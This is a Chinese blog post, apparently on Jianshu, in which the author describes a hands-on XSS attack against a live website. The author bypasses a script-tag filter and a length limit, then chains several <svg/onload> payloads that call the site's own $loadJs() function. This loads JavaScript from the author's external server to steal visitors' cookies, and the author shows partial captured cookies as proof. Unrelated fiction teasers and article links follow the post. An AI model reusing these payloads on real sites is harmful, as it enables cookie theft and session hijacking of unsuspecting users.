一次被動(dòng)的Xss之旅

關(guān)于如何被動(dòng)暫且不談

我只想說(shuō)xss真帥啊

1.好了不多說(shuō)了開(kāi)搞

2.要不開(kāi)始看圖吧

  • xss的介紹我就不說(shuō)了
  • 這次一次實(shí)戰(zhàn)演練
    對(duì)于一個(gè)新手來(lái)說(shuō)必須要對(duì)xss挖掘有明確的思路
    0x01:拿到一個(gè)站叁幢,必須要先去尋找這個(gè)站最有可能存在的xss(輸出點(diǎn))

![RS}G2ITC5VFZZD[{R~]AZX.png

![D90TDO4(P(VZ]J@FOH3(~LF.png](http://upload-images.jianshu.io/upload_images/2495234-28a6cfa024526959.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
0x02:然后構(gòu)造一個(gè)poc
0x03:觀(guān)察構(gòu)造的poc能否被觸發(fā)

      1.如果可以觸發(fā)疚察,證明會(huì)有xss漏洞的存在鹊杖,
      2.不能觸發(fā)冲簿,基本證明不存在xss漏洞

4.沒(méi)辦法繼續(xù)尋找可能存在xss的輸入點(diǎn)美旧,重復(fù)以上的操作尋找輸入點(diǎn)腰埂。

IOTAPA~UWLHDP2`4WAHFMZO.png

但是頁(yè)面并沒(méi)有觸發(fā)彈窗墓怀,猜想可能是過(guò)濾特殊標(biāo)簽<script>
你又防護(hù)罩典奉,我有激光炮欲逃,嘿嘿嘿~ 既然你可以然我輸入那就繼續(xù)構(gòu)造poc

X$ZTZ4RW@`62@LNE{SWXICR.png

![YVTWB}RC)]`BA609SP@@$30.png](http://upload-images.jianshu.io/upload_images/2495234-b6d3c33c35f78761.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

現(xiàn)在我們就來(lái)實(shí)現(xiàn)心中的夢(mèng)想鸠项,搞站了

遠(yuǎn)程加載js,獲取cookie

構(gòu)造Exploit,但是有字符長(zhǎng)度限制辅甥,所以尋找更短的payload

a=document.createElement('script');
a.src=xxx   /你的遠(yuǎn)程js地址
document.head.append(child)

但是長(zhǎng)度依然超過(guò)限制
精短構(gòu)造

a=documnet;
b='script'
a.createElement(b) !!!已經(jīng)是最簡(jiǎn)短的 創(chuàng)建js標(biāo)簽

現(xiàn)在我們就要想酝润,既然需要 <script>標(biāo)簽,觀(guān)察這個(gè)網(wǎng)站自己是否加載了jQuery璃弄,But"滅有"
繼續(xù)觀(guān)察


_IPQ6)DVMA8Z)(_7@VL7D1I.png

接下來(lái)要销,就一起嘿嘿嘿?lài)D~~~

$loadJs() 對(duì)方網(wǎng)站的js api 
重新構(gòu)造payload
<svg/onload="b='http://123'">
<svg/onload="b+='.123.23.23'">
<svg/onload="b+='/xx.js'">
<svg/onload="$loadJs(b)">
遠(yuǎn)程加載的js文件,自己搭建的外網(wǎng)ip

![B4P`DD69Q]BMJUUXW%YEEAV.png](http://upload-images.jianshu.io/upload_images/2495234-3d2b1c8b3e5a3c91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

要不要看一看cookie呀~~
豬吟~

S_F05F{EV@0871DD19$9Q66.png

以上只是部分Cookie夏块,涉及敏感信息疏咐。
以后多有文章纤掸,現(xiàn)在是起步中,共同學(xué)習(xí)浑塞。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末借跪,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子酌壕,更是在濱河造成了極大的恐慌掏愁,老刑警劉巖,帶你破解...
    沈念sama閱讀 212,454評(píng)論 6 493
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件卵牍,死亡現(xiàn)場(chǎng)離奇詭異果港,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)糊昙,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,553評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門(mén)辛掠,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人溅蛉,你說(shuō)我怎么就攤上這事公浪。” “怎么了船侧?”我有些...
    開(kāi)封第一講書(shū)人閱讀 157,921評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵欠气,是天一觀(guān)的道長(zhǎng)。 經(jīng)常有香客問(wèn)我镜撩,道長(zhǎng)预柒,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,648評(píng)論 1 284
  • 正文 為了忘掉前任袁梗,我火速辦了婚禮宜鸯,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘遮怜。我一直安慰自己淋袖,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,770評(píng)論 6 386
  • 文/花漫 我一把揭開(kāi)白布锯梁。 她就那樣靜靜地躺著即碗,像睡著了一般。 火紅的嫁衣襯著肌膚如雪陌凳。 梳的紋絲不亂的頭發(fā)上剥懒,一...
    開(kāi)封第一講書(shū)人閱讀 49,950評(píng)論 1 291
  • 那天,我揣著相機(jī)與錄音合敦,去河邊找鬼初橘。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的保檐。 我是一名探鬼主播耕蝉,決...
    沈念sama閱讀 39,090評(píng)論 3 410
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼展东!你這毒婦竟也來(lái)了赔硫?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 37,817評(píng)論 0 268
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤盐肃,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后权悟,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體砸王,經(jīng)...
    沈念sama閱讀 44,275評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,592評(píng)論 2 327
  • 正文 我和宋清朗相戀三年峦阁,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了谦铃。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,724評(píng)論 1 341
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡榔昔,死狀恐怖驹闰,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情撒会,我是刑警寧澤嘹朗,帶...
    沈念sama閱讀 34,409評(píng)論 4 333
  • 正文 年R本政府宣布,位于F島的核電站诵肛,受9級(jí)特大地震影響屹培,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜怔檩,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 40,052評(píng)論 3 316
  • 文/蒙蒙 一褪秀、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧薛训,春花似錦媒吗、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,815評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至膊爪,卻和暖如春自阱,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背米酬。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,043評(píng)論 1 266
  • 我被黑心中介騙來(lái)泰國(guó)打工沛豌, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,503評(píng)論 2 361
  • 正文 我出身青樓加派,卻偏偏與公主長(zhǎng)得像叫确,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子芍锦,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,627評(píng)論 2 350

推薦閱讀更多精彩內(nèi)容

  • 跨站腳本(XSS)是web應(yīng)用中的一種典型的計(jì)算機(jī)安全漏洞竹勉。XSS允許攻擊者可以在其他用戶(hù)瀏覽的web頁(yè)面中注入客...
    留七七閱讀 7,906評(píng)論 1 26
  • 之前積累了XSS 有一段時(shí)間,因?yàn)槟壳伴_(kāi)始了一件有趣的工程娄琉,需要整合非常多的知識(shí)次乓,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,045評(píng)論 0 16
  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn)孽水,斷路器票腰,智...
    卡卡羅2017閱讀 134,637評(píng)論 18 139
  • 從三月份找實(shí)習(xí)到現(xiàn)在女气,面了一些公司杏慰,掛了不少,但最終還是拿到小米炼鞠、百度、阿里朝扼、京東吟税、新浪姿现、CVTE备典、樂(lè)視家的研發(fā)崗...
    時(shí)芥藍(lán)閱讀 42,218評(píng)論 11 349
  • 爺爺,最近好不好拌屏,沒(méi)有病痛的日子潮针,是否還像從前那樣硬朗瀟灑?家里都好倚喂,我和媽媽?zhuān)湍棠堂颗瘢己孟肽D鷦傠x開(kāi)的那些日...
    賀兒的簡(jiǎn)書(shū)閱讀 793評(píng)論 2 5